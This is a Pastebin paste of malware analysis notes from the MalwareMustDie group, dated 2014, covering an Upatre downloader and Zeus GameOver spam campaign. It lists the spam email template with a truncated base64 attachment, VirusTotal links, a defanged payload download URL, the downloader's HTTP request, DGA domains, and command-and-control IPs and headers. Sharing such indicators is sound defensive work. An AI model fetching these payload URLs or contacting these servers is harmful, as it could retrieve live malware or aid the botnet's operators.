Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // #MalwareMustDie | @unixfreaxjp /malware/checkdomains]$ date
- // Thu Mar 27 02:21:55 JST 2014
- // UPATRE ZZP of ZGMO campaign via Spam attachment
- // Project homebase: http://blog.malwaremustdie.org/2014/03/a-post-to-sting-zeus-p2pgameover-crooks.html
- // Spambot template: type Cutwail (base64) version
- // pic: https://lh6.googleusercontent.com/-VGE48Iutl5A/UzML27nroNI/AAAAAAAAPN8/UH1tP1YHv_o/s529/001.png
- ------=_Part_63352_2507082818.5786714685312
- Content-Type: text/plain; charset=windows-1251; format=flowed
- Content-Transfer-Encoding: 7bit
- Message:
- Number of Images: 1
- Attachment File Type: PDF
- // Boundary in (base64!!!)
- ------=_Part_63352_2507082818.5786714685312
- Content-Type: application/zip;
- name="Scan_001.zip"
- Content-Transfer-Encoding: base64
- Content-Disposition: attachment;
- name="Scan_001.zip"
- UEsDBBQAAAAIAGA6eURlvioWSxwAAABKAAAMAAAAU2Nhbl8wMDEuZXhl7VwJXBTH0u8BFBQE
- jxlNPEcF8QQWGEBRXC4PIgbEaBKCzALLkYeAwHok4hGPREefmEONLwooRk00KhGDR3RGFBRF
- // Virus Total Check/Links:
- Upatre (spam zip) https://www.virustotal.com/en/file/a3f1a5587129c9101808ff40421186f56fc32acbf2127cdeb54a8fb290907452/analysis/
- Upatre (polymorph drop) https://www.virustotal.com/en/file/0a86782adae8a372823abb2293232657161eae5bae6243eea685545e0e5f7448/analysis/1395853555/
- ZGMO (Downlaoded/encoded) https://www.virustotal.com/en/file/e85446688c08dd62bb17a21255fe486eb2fb8ca4acc2e4ae974e31a4ad9dfbe0/analysis/1395853489/
- ZGMO (Polymorph drop) https://www.virustotal.com/en/file/885d3f004200fcd507c0264f88746ee3f5a7a0e5c42f5b5512d6e5e80cc718c2/analysis/1395853466/
- Rootkit (Necurs) https://www.virustotal.com/en/file/f1473d776bca32df38f449b5e4e82bdc58825aabf5b5ab03f02e0b3caaf2a661/analysis/
- // Spambot source:
- Received: from unknown (HELO ovh.fr) (109.190.52.100)
- by xx.xx.xx with SMTP; 26 Mar 2014 02:37:19 +0900
- // Downloads ZGMO from: 91.235.171.231
- URL: h00p://pazisnimase.com//wp-content/uploads/2014/03/TARGT.tis
- //UPATRE GET HEADER:
- GET /wp-content/uploads/2014/03/TARGT.tis HTTP/1.1
- Accept: text/*, application/*
- User-Agent: Updates downloader
- Host: pazisnimase.com
- Cache-Control: no-cache
- // Zeus GMO LAME DGA Callback:
- uotkvoxytjqodfqytemwormzz.biz
- vclbvginizzlydbqpdumvqclv.info
- aulbbiwslxpvvphxnjij.biz
- biayvwobmkptpjddpjnvrc.com
- ypzdfiheskxgmjpjvunvvvsmjtvw.ru
- hzdmjjneyeuxkpzkrunrgyqgcukf.org
- qkdapcqinizsczxrwaelaimznfbqq.biz
- fejbjfceztaigmizxlpjtkivcy.info
- // Zeus GMO DGA ALIVE:
- aulbbiwslxpvvphxnjij.biz,50.116.4.71,DNS1-5.REGISTRAR-SERVERS.COM
- qkdapcqinizsczxrwaelaimznfbqq.biz,178.79.178.243,DNS1.NAMESECURE.COM
- // Zeus GMO CNC Callbacks
- CNC Callback 1 to 50.116.4.71
- CNC Callback 2 to 178.79.178.243
- // CNC Callback Header:
- POST /write HTTP/1.1
- Host: default
- Accept-Encoding:
- Connection: close
- Content-Length: 326
- X-ID: 5555
- ---
- #MalwareMustdie!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement